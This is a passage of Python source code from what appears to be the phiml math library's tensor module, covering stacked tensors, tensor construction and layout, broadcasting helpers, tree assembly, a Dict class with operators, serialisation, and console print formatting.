Use Shape.non_uniform instead.\", DeprecationWarning, stacklevel=2)\n return self._stack_dim\n\n def _cache(self):\n if self._cached is None:\n if self.requires_broadcast:\n return None\n elif all([t.shape.is_uniform for t in self._tensors]):\n natives = [t.native(order=self._shape.names) for t in self._tensors]\n native = choose_backend(*natives).concat(natives, axis=self.shape.index(self._stack_dim.name))\n self._cached = NativeTensor(native, self._shape)\n else: # cache stack_dim on inner tensors\n non_uniform_dim = self._tensors[0].shape.shape.without('dims')\n if len(non_uniform_dim) > 1:\n raise NotImplementedError\n unstacked = [t._unstack(non_uniform_dim.name) for t in self._tensors]\n stacked = []\n for to_stack in zip(*unstacked):\n tensor = TensorStack(to_stack, self._stack_dim)._cache()\n stacked.append(tensor)\n self._cached = TensorStack(stacked, non_uniform_dim)\n return self._cached\n\n @property\n def dtype(self):\n return combine_types(*[t.dtype for t in self._tensors])\n\n @property\n def shape(self):\n return self._shape\n\n def native(self, order: Union[str, tuple, list, Shape] = None, singleton_for_const=False):\n if self._cached is not None:\n return self._cached.native(order=order)\n else:\n order = parse_dim_order(order, check_rank=self.rank)\n # Is only the stack dimension shifted?\n if order is not None and self._shape.without(self._stack_dim).names == tuple(filter(lambda name: name != self._stack_dim.name, order)):\n inner_order = [dim for dim in order if dim != self._stack_dim.name]\n natives = [t.native(inner_order) for t in self._tensors]\n assert self._stack_dim.name in order, f\"Dimension {self._stack_dim} missing from 'order'. Got {order} but tensor has shape {self.shape}.\"\n native = choose_backend(*natives).stack(natives, axis=order.index(self._stack_dim.name))\n return native\n assert not self.shape.is_non_uniform, f\"Cannot convert non-uniform tensor with shape {self.shape} to native tensor.\"\n return self._cache().native(order=order)\n\n def _with_shape_replaced(self, new_shape: Shape):\n if self._cached is not None:\n return self._cached._with_shape_replaced(new_shape)\n else:\n new_stack_dim = new_shape[self._shape.index(self._stack_dim.name)]\n new_tensors = []\n for t in self._tensors:\n inner_indices = [self.shape.index(d) for d in t.shape.names]\n new_inner_shape = new_shape[inner_indices]\n new_tensors.append(t._with_shape_replaced(new_inner_shape))\n return TensorStack(new_tensors, new_stack_dim)\n\n def _getitem(self, selection: dict):\n if self._cached is not None:\n return self._cached._getitem(selection)\n if (self._stack_dim.name not in selection or len(selection) != 1) and not self.requires_broadcast:\n return self._cache()._getitem(selection)\n # --- Inner dims ---\n inner_dict = {dim: sel for dim, sel in selection.items() if dim != self._stack_dim.name}\n tensors = self._tensors\n if len(inner_dict) > 0:\n tensors = [t[inner_dict] for t in tensors]\n # --- stack dimension ---\n if self._stack_dim.name in selection:\n selection = selection[self._stack_dim.name]\n if isinstance(selection, int):\n return tensors[selection]\n elif isinstance(selection, slice):\n return TensorStack(tensors[selection], self._stack_dim)\n else:\n raise NotImplementedError(f\"{type(selection)} not supported. 
Only (int, slice) allowed\")\n else:\n return TensorStack(tensors, self._stack_dim)\n\n def _unstack(self, dim):\n if self._cached is not None:\n return self._cached._unstack(dim)\n if dim == self._stack_dim.name:\n return self._tensors\n else:\n if self.requires_broadcast:\n unstacked = [t._unstack(dim) for t in self._tensors]\n return tuple([TensorStack(items, self._stack_dim) for items in zip(*unstacked)])\n else:\n return self._cache()._unstack(dim)\n\n def _op1(self, native_function):\n if self.requires_broadcast:\n tensors = [t._op1(native_function) for t in self._tensors]\n return TensorStack(tensors, self._stack_dim)\n else:\n return self._cache()._op1(native_function)\n\n def _op2(self, other, operator, native_function, op_name: str = 'unknown', op_symbol: str = '?'):\n other = self._tensor(other)\n if self.requires_broadcast:\n if self._stack_dim.name in other.shape:\n other_slices = other._unstack(self._stack_dim.name)\n tensors = [operator(t1, t2) for t1, t2 in zip(self._tensors, other_slices)]\n else:\n tensors = [operator(t, other) for t in self._tensors]\n return TensorStack(tensors, self._stack_dim)\n elif isinstance(other, NativeTensor) or (isinstance(other, TensorStack) and not other.requires_broadcast):\n new_shape, (native1, native2) = broadcastable_native_tensors(self, other) # ToDo we don't have to expand all\n result_tensor = native_function(native1, native2)\n return NativeTensor(result_tensor, new_shape, new_shape)\n elif isinstance(other, TensorStack) and other.requires_broadcast:\n if other._stack_dim.name in self.shape:\n self_slices = self._unstack(other._stack_dim.name)\n tensors = [operator(t1, t2) for t1, t2 in zip(self_slices, other._tensors)]\n else:\n tensors = [operator(self, t) for t in other._tensors]\n return TensorStack(tensors, self._stack_dim)\n else:\n return NotImplemented\n\n def _natives(self) -> tuple:\n if self._cached is not None:\n return self._cached._natives()\n else:\n return sum([t._natives() for t in self._tensors], ())\n\n def _spec_dict(self) -> dict:\n if self._cached is not None:\n return self._cached._spec_dict()\n else:\n return {'type': TensorStack, 'stack_dim': self._stack_dim, 'tensors': [t._spec_dict() for t in self._tensors]}\n\n @classmethod\n def _from_spec_and_natives(cls, spec: dict, natives: list):\n tensors = [t['type']._from_spec_and_natives(t, natives) for t in spec['tensors']]\n return TensorStack(tensors, spec['stack_dim'])\n\n def _with_natives_replaced(self, natives: list):\n if self._cached is not None:\n return self._cached._with_natives_replaced(natives)\n else:\n tensors = [t._with_natives_replaced(natives) for t in self._tensors]\n return TensorStack(tensors, self._stack_dim)\n\n def _expand(self):\n if self.requires_broadcast:\n for t in self._tensors:\n t._expand()\n self._cache()\n\n @property\n def is_cached(self):\n return self._cached is not None\n\n def _simplify(self):\n if self.is_cached:\n return self._cached\n else:\n return self\n\n\n
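# Note (added for clarity, not part of the original file): TensorStack keeps its component tensors separate; a single native tensor is only materialized when _cache() runs, e.g. triggered by native() or by non-broadcast ops.\n\n\n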
def tensor(data,\n *shape: Shape,\n convert: bool = True,\n default_list_dim=channel('vector')) -> Tensor: # TODO assume convert_unsupported, add convert_external=False for constants\n \"\"\"\n Create a Tensor from the specified `data`.\n If `convert=True`, converts `data` to the preferred format of the default backend.\n\n `data` must be one of the following:\n \n * Number: returns a dimensionless Tensor.\n * Native tensor such as NumPy array, TensorFlow tensor or PyTorch tensor.\n * `tuple` or `list` of numbers: backs the Tensor with native tensor.\n * `tuple` or `list` of non-numbers: creates tensors for the items and stacks them.\n * Tensor: renames dimensions and dimension types if `shape` is specified. Converts all internal native values of the tensor if `convert=True`.\n * Shape: creates a 1D tensor listing the dimension sizes.\n \n While specifying `shape` is optional in some cases, it is recommended to always specify it.\n \n Dimension types are inferred from the `Shape` constructors used, e.g. `batch`, `spatial`, `channel`.\n\n Implementations:\n\n * NumPy: [`numpy.array`](https://numpy.org/doc/stable/reference/generated/numpy.array.html)\n * PyTorch: [`torch.tensor`](https://pytorch.org/docs/stable/generated/torch.tensor.html), [`torch.from_numpy`](https://pytorch.org/docs/stable/generated/torch.from_numpy.html)\n * TensorFlow: [`tf.convert_to_tensor`](https://www.tensorflow.org/api_docs/python/tf/convert_to_tensor)\n * Jax: [`jax.numpy.array`](https://jax.readthedocs.io/en/latest/_autosummary/jax.numpy.array.html)\n\n See Also:\n `phiml.math.wrap()` which uses `convert=False`, `layout()`.\n\n Args:\n data: native tensor, scalar, sequence, Shape or Tensor\n shape: Ordered dimensions and types. If sizes are defined, they will be checked against `data`.\n convert: If True, converts the data to the native format of the current default backend.\n If False, wraps the data in a `Tensor` but keeps the given data reference if possible.\n\n Raises:\n AssertionError: if dimension names are not provided and cannot automatically be inferred\n ValueError: if `data` is not tensor-like\n\n Returns:\n Tensor containing same values as data\n\n Examples:\n >>> tensor([1, 2, 3], channel(vector='x,y,z'))\n (x=1, y=2, z=3)\n\n >>> tensor([1., 2, 3], channel(vector='x,y,z'))\n (x=1.000, y=2.000, z=3.000) float64\n\n >>> tensor(numpy.zeros([10, 8, 6, 2]), batch('batch'), spatial('x,y'), channel(vector='x,y'))\n (batchᵇ=10, xˢ=8, yˢ=6, vectorᶜ=x,y) float64 const 0.0\n\n >>> tensor([(0, 1), (0, 2), (1, 3)], instance('particles'), channel(vector='x,y'))\n (x=0, y=1); (x=0, y=2); (x=1, y=3) (particlesⁱ=3, vectorᶜ=x,y)\n\n >>> tensor(numpy.random.randn(10))\n (vectorᶜ=10) float64 -0.128 ± 1.197 (-2e+00...2e+00)\n \"\"\"\n assert all(isinstance(s, Shape) for s in shape), f\"Cannot create tensor because shape needs to be one or multiple Shape instances but got {shape}\"\n shape = None if len(shape) == 0 else concat_shapes(*shape)\n if isinstance(data, Tensor):\n if convert:\n backend = data.default_backend\n if backend != default_backend():\n data = data._op1(lambda n: convert_(n, use_dlpack=False))\n if shape is None:\n return data\n else:\n if None in shape.sizes:\n shape = shape.with_sizes(data.shape.sizes)\n return data._with_shape_replaced(shape)\n elif isinstance(data, Shape):\n if shape is None:\n shape = channel('dims')\n shape = shape.with_size(data.names)\n data = data.sizes\n elif not shape:\n assert data.rank == 1, f\"When wrapping a Shape as a scalar tensor, it must be a rank-1 shape but got {data}\"\n data = data.size\n else:\n assert shape.rank == 1, \"Can only convert 1D shapes to Tensors\"\n shape = shape.with_size(data.names)\n data = data.sizes\n elif isinstance(data, str) or data is None:\n return layout(data)\n elif isinstance(data, (numbers.Number, bool)):\n assert not shape, f\"Trying to create a zero-dimensional Tensor from value '{data}' but shape={shape}\"\n if convert:\n data = default_backend().as_tensor(data, convert_external=True)\n return NativeTensor(data, EMPTY_SHAPE)\n if isinstance(data, (tuple, list)):\n if all(isinstance(d, (bool, int, float, complex)) 
for d in data):\n array = np.array(data)\n assert array.dtype != object\n data = array\n elif all(isinstance(d, str) for d in data):\n return layout(data, shape or default_list_dim)\n else:\n try:\n inner_shape = [] if shape is None else [shape[1:]]\n tensors = [d if isinstance(d, Tensor) else tensor(d, *inner_shape, convert=convert) for d in data]\n return stack(tensors, default_list_dim if shape is None else shape[0].with_sizes([len(tensors)]), expand_values=True)\n except IncompatibleShapes:\n assert not convert, f\"Cannot convert {data} to tensor given shape {shape}\"\n return layout(data, shape or default_list_dim)\n except ValueError:\n assert not convert, f\"Cannot convert {data} to tensor\"\n return layout(data, shape or default_list_dim)\n try:\n backend = choose_backend(data)\n if shape is None:\n assert backend.ndims(data) <= 1, \"Specify dimension names for tensors with more than 1 dimension\"\n shape = default_list_dim if backend.ndims(data) == 1 else EMPTY_SHAPE\n shape = shape.with_sizes(backend.staticshape(data))\n else:\n # fill in sizes or check them\n sizes = backend.staticshape(data)\n if len(sizes) != len(shape):\n raise IncompatibleShapes(f\"Rank of given shape {shape} does not match data with sizes {sizes}\")\n for size, s in zip(sizes, shape.sizes):\n if s is not None:\n assert s == size, f\"Given shape {shape} does not match data with sizes {sizes}. Consider leaving the sizes undefined.\"\n shape = shape.with_sizes(sizes, keep_item_names=True)\n if convert:\n data = convert_(data, use_dlpack=False)\n return NativeTensor(data, shape)\n except NoBackendFound:\n raise ValueError(f\"{type(data)} is not supported. Only (Tensor, tuple, list, np.ndarray, native tensors) are allowed.\\nCurrent backends: {BACKENDS}\")\n\n\ndef wrap(data,\n *shape: Shape) -> Tensor:\n \"\"\" Short for `phiml.math.tensor()` with `convert=False`. 
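\n\n Example (a minimal sketch added for illustration, mirroring the `tensor()` examples above):\n\n >>> wrap([1, 2, 3], channel(vector='x,y,z'))\n (x=1, y=2, z=3)\n 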
\"\"\"\n return tensor(data, *shape, convert=False) # TODO inline, simplify\n\n\ndef layout(objects, *shape: Shape) -> Tensor:\n \"\"\"\n Wraps a Python tree in a `Tensor`, allowing elements to be accessed via dimensions.\n A python tree is a structure of nested `tuple`, `list`, `dict` and *leaf* objects where leaves can be any Python object.\n\n All keys of `dict` containers must be of type `str`.\n The keys are automatically assigned as item names along that dimension unless conflicting with other elements.\n\n Strings may also be used as containers.\n\n Example:\n >>> t = layout({'a': 'text', 'b': [0, 1]}, channel('dict,inner'))\n >>> t.inner[1].dict['a'].native()\n 'e'\n\n See Also:\n `tensor()`, `wrap()`.\n\n Args:\n objects: PyTree of `list` or `tuple`.\n *shape: Tensor dimensions\n\n Returns:\n `Tensor`.\n Calling `Tensor.native()` on the returned tensor will return `objects`.\n \"\"\"\n assert all(isinstance(s, Shape) for s in shape), f\"shape needs to be one or multiple Shape instances but got {shape}\"\n shape = EMPTY_SHAPE if len(shape) == 0 else concat_shapes(*shape)\n if isinstance(objects, Layout):\n assert objects.shape == shape\n return objects\n\n if not shape.well_defined:\n\n def recursive_determine_shape(native, shape: Shape):\n if not shape:\n return shape\n if isinstance(native, dict):\n assert all([isinstance(k, str) for k in native.keys()]), f\"All dict keys in PyTrees must be str but got {tuple(native.keys())}\"\n shape = shape.replace(shape[0], shape[0].with_size(tuple(native.keys())))\n if shape.rank == 1:\n return shape.with_sizes((len(native),))\n inner_shape = shape[1:]\n if isinstance(native, (tuple, list)):\n inner_shapes = [recursive_determine_shape(n, inner_shape) for n in native]\n elif isinstance(native, dict):\n inner_shapes = [recursive_determine_shape(n, inner_shape) for n in native.values()]\n else:\n raise ValueError(native)\n return shape_stack(shape[0], *inner_shapes)\n\n shape = recursive_determine_shape(objects, shape)\n\n return Layout(objects, shape)\n # if shape.volume == 1:\n # objects = np.asarray(objects, dtype=object)\n #\n # if isinstance(objects, (tuple, list)):\n # objects = np.asarray(objects, dtype=object)\n # if isinstance(objects, np.ndarray) and objects.dtype == object:\n # return Layout(objects, shape)\n # else:\n # assert shape.volume == 1, f\"Cannot layout object of type {objects} along {shape}, a tuple, list or object array is required.\"\n\n\ndef compatible_tensor(data, compat_shape: Shape = None, compat_natives=(), convert=False):\n if isinstance(data, Tensor):\n return data\n elif isinstance(data, Shape):\n if data.spatial.rank == 1:\n return wrap(data.spatial.size)\n assert compat_shape.channel.rank == 1, \"Only single-channel tensors support implicit casting from Shape to tensor\"\n assert data.rank == compat_shape.channel.volume\n return wrap(data.spatial.sizes, *compat_shape.channel.with_size(data.names))\n else:\n data_type = type(data)\n backend = choose_backend(*compat_natives, data)\n try:\n data = backend.as_tensor(data, convert_external=convert)\n shape = backend.staticshape(data)\n except ValueError as e:\n raise ValueError(e)\n if len(shape) == 0:\n return NativeTensor(data, EMPTY_SHAPE)\n elif isinstance(data, (tuple, list)): # always channel, add vector if not available\n data = backend.as_tensor(data)\n if len(shape) == compat_shape.channel_rank:\n other_tensor = wrap(data, compat_shape.channel)\n return other_tensor\n if compat_shape.channel_rank > 1 and len(shape) == 1 and 'vector' in 
compat_shape.channel:\n return wrap(data, compat_shape['vector'].without_sizes())\n elif len(shape) == compat_shape.rank:\n if len(shape) > 1:\n warnings.warn(f\"Combining a phiml.math.Tensor with a {data_type} of same shape is not invariant under shape permutations. Please convert the {data_type} to a phiml.math.Tensor first. Shapes: {shape} and {compat_shape}\", SyntaxWarning, stacklevel=5)\n return NativeTensor(data, compat_shape.with_sizes(shape))\n else:\n raise ValueError(f\"Cannot combine tensor of shape {shape} with tensor of shape {compat_shape}\")\n\n\ndef broadcastable_native_tensors(*tensors):\n \"\"\"\n Expands and transposes the dimensions of the given tensors so that they all have the same dimension order.\n\n Args:\n *tensors: sequence of Tensors\n\n Returns:\n (shape, native tensors)\n\n \"\"\"\n from ._sparse import SparseCoordinateTensor, CompressedSparseMatrix, dense\n if any(isinstance(t, (SparseCoordinateTensor, CompressedSparseMatrix)) for t in tensors) and not all(isinstance(t, (SparseCoordinateTensor, CompressedSparseMatrix)) for t in tensors):\n tensors = [dense(t) for t in tensors]\n broadcast_shape = merge_shapes(*[t.shape for t in tensors])\n natives = [t.native(order=broadcast_shape.names) if t.rank > 0 else t.native() for t in tensors]\n return broadcast_shape, natives\n\n\n
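# Example (illustrative sketch, not part of the original file): an element-wise minimum op could be built as custom_op2(x, y, l_operator=minimum, l_native_function=lambda a, b: choose_backend(a, b).minimum(a, b), op_name='minimum'), where minimum is the Tensor-level function being defined and the backend is assumed to expose a minimum() method.\n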
def custom_op2(x: Union[Tensor, float], y: Union[Tensor, float], l_operator, l_native_function, r_operator=None, r_native_function=None, op_name: str = 'unknown', op_symbol: str = None) -> Tensor:\n \"\"\"\n Perform a custom operator on two tensors.\n This method first tries calling _op2() on the first tensor and if that fails, tries it on the second tensor.\n\n Args:\n x: Left argument\n y: Right argument\n l_operator: Operator function acting on Tensors\n l_native_function: Operator function acting on natives\n r_operator: Argument-reversed operator function acting on Tensors\n r_native_function: Argument-reversed operator function acting on natives\n op_name: Name of the operator function for debugging purposes. Leading 'r' will be added for the operand-reversed version.\n op_symbol: Short name for the operator, independent of argument order.\n\n Returns:\n `Tensor`\n \"\"\"\n if op_symbol is None:\n op_symbol = op_name\n x = wrap(x)\n y = wrap(y)\n result = x._op2(y, l_operator, l_native_function, op_name, op_symbol)\n if result is NotImplemented:\n if r_operator is None:\n r_operator = lambda a, b: l_operator(b, a)\n if r_native_function is None:\n r_native_function = lambda a, b: l_native_function(b, a)\n result = y._op2(x, r_operator, r_native_function, f'r{op_name}', op_symbol)\n if result is NotImplemented:\n raise NotImplementedError(f\"Operation not supported between {type(x)} and {type(y)}\")\n return result\n\n\ndef disassemble_tensors(tensors: Union[Tuple[Tensor, ...], List[Tensor]], expand: bool) -> Tuple[tuple, Tuple[Shape], tuple]:\n \"\"\"\n Args:\n tensors: Tuple or list of Tensors.\n expand: Whether to add collapsed dimensions to the native tensors.\n\n Returns:\n natives: tuple of native tensors\n shapes: tuple of tensor `Shape`s, one per tensor\n specs: Identification primitives from which the tensor can be reconstructed given the natives.\n One per tensor.\n \"\"\"\n for t in tensors:\n if isinstance(t, TensorStack) or expand:\n t._expand()\n natives = sum([t._natives() for t in tensors], ())\n shapes = tuple([t.shape for t in tensors])\n specs = tuple([t._spec_dict() for t in tensors])\n return natives, shapes, specs\n\n\ndef assemble_tensors(natives: Union[tuple, list], specs: Union[Tuple[dict, ...], List[dict]]):\n natives = list(natives)\n result = []\n for spec in specs:\n t = spec['type']._from_spec_and_natives(spec, natives)\n result.append(t)\n return result\n\n\nMISSING_TENSOR = 'missing'\nNATIVE_TENSOR = 'native'\n\n\ndef disassemble_tree(obj: PhiTreeNodeType) -> Tuple[PhiTreeNodeType, List[Tensor]]:\n \"\"\"\n Splits a nested structure of Tensors into the structure without the tensors and an ordered list of tensors.\n Native tensors will be wrapped in phiml.math.Tensors with default dimension names and dimension types `None`.\n\n See Also:\n `assemble_tree()`\n\n Args:\n obj: Nested structure of `Tensor` objects.\n Nested structures include: `tuple`, `list`, `dict`, `phiml.math.magic.PhiTreeNode`.\n\n Returns:\n empty structure: Same structure as `obj` but with the tensors replaced by `None`.\n tensors: Ordered `list` of all contained `Tensor` objects.\n \"\"\"\n if obj is None:\n return MISSING_TENSOR, []\n elif isinstance(obj, Tensor):\n return None, [obj]\n elif isinstance(obj, (tuple, list)):\n keys = []\n values = []\n for item in obj:\n key, value = disassemble_tree(item)\n keys.append(key)\n values.extend(value)\n return (tuple(keys) if isinstance(obj, tuple) else keys), values\n elif isinstance(obj, dict):\n keys = {}\n values = []\n for name, item in obj.items():\n key, value = disassemble_tree(item)\n keys[name] = key\n values.extend(value)\n return keys, values\n elif isinstance(obj, PhiTreeNode):\n attributes = variable_attributes(obj)\n keys = {}\n values = []\n for attr in attributes:\n key, value = disassemble_tree(getattr(obj, attr))\n keys[attr] = key\n values.extend(value)\n return copy_with(obj, **keys), values\n else:\n try:\n backend = choose_backend(obj)\n if backend == OBJECTS:\n return obj, []\n sizes = backend.staticshape(obj)\n shape = Shape(sizes, tuple([f\"dim{i}\" for i in range(len(sizes))]), (None,) * len(sizes), (None,) * len(sizes))\n return NATIVE_TENSOR, [NativeTensor(obj, shape)]\n except NoBackendFound:\n return obj, []\n\n\ndef assemble_tree(obj: PhiTreeNodeType, values: 
List[Tensor]) -> PhiTreeNodeType:\n \"\"\" Reverses `disassemble_tree()` given an empty nested structure and a list of tensors. \"\"\"\n if obj is MISSING_TENSOR:\n return None\n elif obj is NATIVE_TENSOR:\n value = values.pop(0)\n assert isinstance(value, NativeTensor), f\"Failed to assemble tree structure. Encountered {value}\"\n return value._native\n elif obj is None:\n value = values.pop(0)\n assert isinstance(value, Tensor)\n return value\n elif isinstance(obj, list):\n return [assemble_tree(item, values) for item in obj]\n elif isinstance(obj, tuple):\n return tuple([assemble_tree(item, values) for item in obj])\n elif isinstance(obj, dict):\n return {name: assemble_tree(val, values) for name, val in obj.items()}\n elif isinstance(obj, PhiTreeNode):\n attributes = variable_attributes(obj)\n values = {a: assemble_tree(getattr(obj, a), values) for a in attributes}\n return copy_with(obj, **values)\n else:\n return obj\n\n\ndef cached(t: TensorOrTree) -> TensorOrTree:\n assert isinstance(t, (Tensor, PhiTreeNode)), f\"All arguments must be Tensors but got {type(t)}\"\n if isinstance(t, NativeTensor):\n return t._cached()\n elif isinstance(t, TensorStack):\n if t._cached is not None:\n return t._cached\n inners = cached(t._tensors)\n if t.requires_broadcast:\n return TensorStack(inners, t._stack_dim)\n else:\n natives = [t.native(order=t.shape.names) for t in inners]\n native = choose_backend(*natives).stack(natives, axis=t.shape.index(t._stack_dim.name))\n return NativeTensor(native, t.shape)\n elif isinstance(t, Layout):\n return t\n elif isinstance(t, PhiTreeNode):\n tree, tensors = disassemble_tree(t)\n tensors_ = [cached(t_) for t_ in tensors]\n return assemble_tree(tree, tensors_)\n else:\n raise AssertionError(f\"Cannot cache {type(t)} {t}\")\n\n\ndef expand_tensor(value: Tensor, dims: Shape):\n if not dims:\n return value\n dims.assert_all_sizes_defined()\n if isinstance(value, NativeTensor):\n if dims.is_uniform:\n return NativeTensor(value._native, value._native_shape, dims & value._shape)\n else:\n stack_dim = dims.shape.without('dims')\n if stack_dim.rank > 1:\n raise NotImplementedError(\"Higher-order non-uniform expand() not yet supported\")\n unstacked_dims = [dims.after_gather(i) for i in stack_dim.meshgrid()]\n components = [NativeTensor(value._native, value._native_shape, inner_shape) for inner_shape in unstacked_dims]\n return TensorStack(components, stack_dim)\n if isinstance(value, TensorStack):\n expanded = [expand_tensor(v, dims.without(value.stack_dim)) for v in value._tensors]\n return TensorStack(expanded, value.stack_dim)\n raise NotImplementedError\n\n\nclass Dict(dict):\n \"\"\"\n Dictionary of `Tensor` or `phiml.math.magic.PhiTreeNode` values.\n Dicts are not themselves tensors and do not have a shape.\n Use `layout()` to treat `dict` instances like tensors.\n\n In addition to dictionary functions, supports mathematical operators with other `Dict`s and lookup via `.key` syntax.\n `Dict` implements `phiml.math.magic.PhiTreeNode` so instances can be passed to math operations like `sin`.\n \"\"\"\n\n def __value_attrs__(self):\n return tuple(self.keys())\n \n # --- Dict[key] ---\n\n def __getattr__(self, key):\n try:\n return self[key]\n except KeyError as k:\n raise AttributeError(k)\n\n def __setattr__(self, key, value):\n self[key] = value\n\n def __delattr__(self, key):\n try:\n del self[key]\n except KeyError as k:\n raise AttributeError(k)\n \n # --- operators ---\n \n def __neg__(self):\n return Dict({k: -v for k, v in self.items()})\n \n def 
__invert__(self):\n return Dict({k: ~v for k, v in self.items()})\n \n def __abs__(self):\n return Dict({k: abs(v) for k, v in self.items()})\n \n def __round__(self, n=None):\n return Dict({k: round(v) for k, v in self.items()})\n\n def __add__(self, other):\n if isinstance(other, Dict):\n return Dict({key: val + other[key] for key, val in self.items()})\n else:\n return Dict({key: val + other for key, val in self.items()})\n\n def __radd__(self, other):\n if isinstance(other, Dict):\n return Dict({key: other[key] + val for key, val in self.items()})\n else:\n return Dict({key: other + val for key, val in self.items()})\n\n def __sub__(self, other):\n if isinstance(other, Dict):\n return Dict({key: val - other[key] for key, val in self.items()})\n else:\n return Dict({key: val - other for key, val in self.items()})\n\n def __rsub__(self, other):\n if isinstance(other, Dict):\n return Dict({key: other[key] - val for key, val in self.items()})\n else:\n return Dict({key: other - val for key, val in self.items()})\n\n def __mul__(self, other):\n if isinstance(other, Dict):\n return Dict({key: val * other[key] for key, val in self.items()})\n else:\n return Dict({key: val * other for key, val in self.items()})\n\n def __rmul__(self, other):\n if isinstance(other, Dict):\n return Dict({key: other[key] * val for key, val in self.items()})\n else:\n return Dict({key: other * val for key, val in self.items()})\n\n def __truediv__(self, other):\n if isinstance(other, Dict):\n return Dict({key: val / other[key] for key, val in self.items()})\n else:\n return Dict({key: val / other for key, val in self.items()})\n\n def __rtruediv__(self, other):\n if isinstance(other, Dict):\n return Dict({key: other[key] / val for key, val in self.items()})\n else:\n return Dict({key: other / val for key, val in self.items()})\n\n def __floordiv__(self, other):\n if isinstance(other, Dict):\n return Dict({key: val // other[key] for key, val in self.items()})\n else:\n return Dict({key: val // other for key, val in self.items()})\n\n def __rfloordiv__(self, other):\n if isinstance(other, Dict):\n return Dict({key: other[key] // val for key, val in self.items()})\n else:\n return Dict({key: other // val for key, val in self.items()})\n\n def __pow__(self, power, modulo=None):\n assert modulo is None\n if isinstance(power, Dict):\n return Dict({key: val ** power[key] for key, val in self.items()})\n else:\n return Dict({key: val ** power for key, val in self.items()})\n\n def __rpow__(self, other):\n if isinstance(other, Dict):\n return Dict({key: other[key] ** val for key, val in self.items()})\n else:\n return Dict({key: other ** val for key, val in self.items()})\n\n def __mod__(self, other):\n if isinstance(other, Dict):\n return Dict({key: val % other[key] for key, val in self.items()})\n else:\n return Dict({key: val % other for key, val in self.items()})\n\n def __rmod__(self, other):\n if isinstance(other, Dict):\n return Dict({key: other[key] % val for key, val in self.items()})\n else:\n return Dict({key: other % val for key, val in self.items()})\n\n def __eq__(self, other):\n if isinstance(other, Dict):\n return Dict({key: val == other[key] for key, val in self.items()})\n else:\n return Dict({key: val == other for key, val in self.items()})\n\n def __ne__(self, other):\n if isinstance(other, Dict):\n return Dict({key: val != other[key] for key, val in self.items()})\n else:\n return Dict({key: val != other for key, val in self.items()})\n\n def __lt__(self, other):\n if isinstance(other, Dict):\n return 
Dict({key: val < other[key] for key, val in self.items()})\n else:\n return Dict({key: val < other for key, val in self.items()})\n\n def __le__(self, other):\n if isinstance(other, Dict):\n return Dict({key: val <= other[key] for key, val in self.items()})\n else:\n return Dict({key: val <= other for key, val in self.items()})\n\n def __gt__(self, other):\n if isinstance(other, Dict):\n return Dict({key: val > other[key] for key, val in self.items()})\n else:\n return Dict({key: val > other for key, val in self.items()})\n\n def __ge__(self, other):\n if isinstance(other, Dict):\n return Dict({key: val >= other[key] for key, val in self.items()})\n else:\n return Dict({key: val >= other for key, val in self.items()})\n\n # --- overridden methods ---\n\n def copy(self):\n return Dict(self)\n\n\ndef to_dict(value: Union[Tensor, Shape]):\n \"\"\"\n Returns a serializable form of a `Tensor` or `Shape`.\n The result can be written to a JSON file, for example.\n\n See Also:\n `from_dict()`.\n\n Args:\n value: `Tensor` or `Shape`\n\n Returns:\n Serializable Python tree of primitives\n \"\"\"\n if isinstance(value, Shape):\n return value._to_dict(include_sizes=True)\n elif isinstance(value, Tensor):\n return value._to_dict()\n raise ValueError(f\"Cannot convert {value} to a dict\")\n\n\ndef from_dict(dict_: dict, convert=False):\n \"\"\"\n Loads a `Tensor` or `Shape` from a serialized form.\n\n See Also:\n `to_dict()`.\n\n Args:\n dict_: Serialized tensor properties.\n convert: Whether to convert the data to the current backend format or keep it as a Numpy array.\n\n Returns:\n `Tensor` or `Shape`.\n \"\"\"\n shape = Shape._from_dict(dict_)\n if 'data' in dict_:\n return tensor(dict_['data'], shape, convert=convert)\n else:\n return shape\n\n\n\n\nclass BroadcastFormatter:\n \"\"\"\n Usage documented in math.__init__.\n\n How it works:\n * -f calls __neg__ which tells tensors to call register_formatted() instead of formatting normally.\n * Then __sub__ is called which maps the actual string formatting.\n \"\"\"\n\n def __init__(self):\n self.values: List[Tensor] = None\n\n def register_formatted(self, value: Tensor, format_spec: str):\n self.values.append(value)\n return \"{\" + f\"{len(self.values) - 1}:{format_spec}\" + \"}\"\n\n def format(self, other: str):\n assert isinstance(other, str), \"math.f must be used on a string\"\n from ._functional import map_\n if self.values is None:\n raise SyntaxError(\"Use the syntax -f-f\\\"{tensor}\\\". 
Leading '-' is missing.\")\n result = map_(other.format, *self.values)\n self.values = None\n return result\n\n def __sub__(self, other):\n return self.format(other)\n\n def __neg__(self):\n if self.values is not None:\n raise SyntaxError(\"-f called twice without formatting string.\")\n self.values = []\n return self\n\n\nBROADCAST_FORMATTER = BroadcastFormatter()\n\n\n@dataclass\nclass Color:\n name: str\n console_foreground_begin: str\n\n def __call__(self, obj, **kwargs):\n text = str(obj).replace(CONSOLE_END, self.console_foreground_begin)\n return f\"{self.console_foreground_begin}{text}{CONSOLE_END if self.console_foreground_begin else ''}\"\n\n\nDEFAULT = Color(\"Default\", '')\nBLUE = Color(\"Blue\", '\\033[94m')\nGREEN = Color(\"Green\", '\\033[92m')\nYELLOW = Color(\"Yellow\", '\\033[93m')\nGREY = Color(\"Grey\", '\\033[37m')\nCONSOLE_END = '\\033[0m'\n\n\n@dataclass\nclass ColorScheme:\n value: Color\n shape: Color\n dtype: Color\n fine: Color\n\n\nDEFAULT_COLORS = ColorScheme(BLUE, GREEN, YELLOW, GREY)\nNO_COLORS = ColorScheme(DEFAULT, DEFAULT, DEFAULT, DEFAULT)\n\n\n@dataclass\nclass PrintOptions:\n layout: str = 'auto'\n float_format: str = None\n threshold: int = 8\n colors: ColorScheme = None\n include_shape: bool = None\n include_dtype: bool = None\n\n def get_colors(self):\n if self.colors is True:\n return DEFAULT_COLORS\n elif self.colors is False:\n return NO_COLORS\n elif self.colors is not None:\n return self.colors\n else: # None\n return DEFAULT_COLORS if check_is_printing() else NO_COLORS\n\n\ndef check_is_printing():\n import traceback, sys\n stack = traceback.extract_stack()\n for frame in stack:\n if \"_pydevd_bundle\\\\pydevd_xml.py\" in frame.filename or \"_pydevd_bundle/pydevd_xml.py\" in frame.filename:\n return False\n for frame in stack:\n if frame.line.strip().startswith('print('):\n return True\n if 'ipykernel' in sys.modules:\n return True\n return False\n\n\ndef format_summary(self: Tensor, options: PrintOptions) -> str:\n \"\"\"\n Returns shape + dtype + content summary\n\n * `bool`: n / N True\n * `float`: mean ± std (min...max)\n \"\"\"\n if not self.available:\n return format_tracer(self, options)\n from ._sparse import SparseCoordinateTensor, 